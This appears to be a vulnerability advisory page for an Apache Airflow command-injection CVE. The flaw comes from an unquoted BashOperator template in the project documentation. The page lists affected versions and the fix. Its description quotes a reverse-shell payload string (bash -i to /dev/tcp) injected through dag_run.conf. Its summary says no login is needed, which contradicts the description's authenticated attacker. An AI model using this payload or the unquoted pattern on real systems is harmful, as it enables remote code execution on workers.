CVE-2026-42252 Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern

Critical 9.1 Published Updated

Authenticated users can execute arbitrary commands if Dag authors copied an insecure BashOperator example from Airflow documentation.

Exploited in the wild
Not known
Login needed
Not needed
Attackable
Over the internet
Victim action needed
Not needed
Fix
Available

What is CVE-2026-42252?

CVE-2026-42252 is a critical command injection vulnerability in Apache Airflow, published on 1 Jun 2026. An attacker can exploit it over the internet without logging in, with no action from the victim.

Official description

Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.

Weakness: CWE-1336

Which versions are affected by CVE-2026-42252?

4 open source packages ship an affected version, including apache-airflow and airflow. It affects 1 product.

PackageAffectedFixed in
apache-airflow PyPIFrom 3.0.03.2.2
apache-airflow PyPIFrom 3.0.03.2.2
apache-airflow PyPIFrom 3.0.03.2.2
airflow BitnamiFrom 3.0.03.2.2

Products include Apache Airflow.

How do I fix CVE-2026-42252?

Upgrade apache-airflow to 3.2.2 or later.

Upgrade, and pass arguments to programs as a list instead of through a shell. More about Command injection.

Is CVE-2026-42252 being exploited?

There is no known exploitation of CVE-2026-42252 in the wild and no public exploit code.

All Apache Airflow vulnerabilities

Sources

Also known as BIT-airflow-2026-42252, ECHO-e5bf-6322-947e, GHSA-c85c-g9wv-pph2, MINI-3cm5-5hh3-pfwq, PYSEC-2026-184.

Is CVE-2026-42252 in your software?

Upload an SBOM and sbomify checks it against every vulnerability here, every day.

Check your SBOMs for free